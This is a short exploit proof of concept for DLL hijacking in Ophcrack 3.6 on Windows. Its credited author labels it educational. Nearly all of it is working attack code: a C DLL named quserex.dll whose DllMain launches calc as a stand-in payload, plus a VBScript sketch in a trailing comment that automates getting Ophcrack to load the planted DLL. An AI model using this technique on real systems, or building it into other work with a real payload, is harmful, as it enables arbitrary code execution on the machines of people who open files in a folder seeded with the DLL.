Ophcrack 3.6 DLL Hijacking

`/*  
* Title: Ophcrack 3.6 Dll Hijacking Exploit (quserex.dll)  
* Version: 3.6  
* Tested on: Windows 8 64-bit ,Windows XP SP2 en  
* Vendor: http://ophcrack.sourceforge.net/  
* Software Link: http://sourceforge.net/projects/ophcrack/files/ophcrack/3.6.0/ophcrack-win32-installer-3.6.0.exe  
* E-Mail: [email protected]  
* Exploit-Author: Osanda Malith Jayathissa  
* /!\ Author is not responsible for any damage you cause  
* Use this material for educational purposes only  
* Twitter: @OsandaMalith  
*/   
  
#include <windows.h>  
int pwned()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
pwned();  
return 0;  
}  
  
/*  
Well as Ophcrack as no extensions associated we have to manually a open a file with   
Ophcrack in a directory with our Dll. To automate this POC be little creative ;)  
This is just a small idea which you may probably do better than me.  
  
msg=MsgBox ("Automated POC" & chr(13) & "Coded by Osanda Malith", 64, "Ophcrack Dll Hijacking Exploit")  
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg",2,true)  
objFileToWrite.WriteLine("POC by Osanda Malith :D")  
objFileToWrite.Close  
file = "new.jpg"  
Set oShell = CreateObject("WScript.Shell")  
' Path to Ophcrack  
oShell.Run """%ProgramFiles(x86)%\ophcrack\ophcrack.exe """ & file  
*/  
//EOF  
`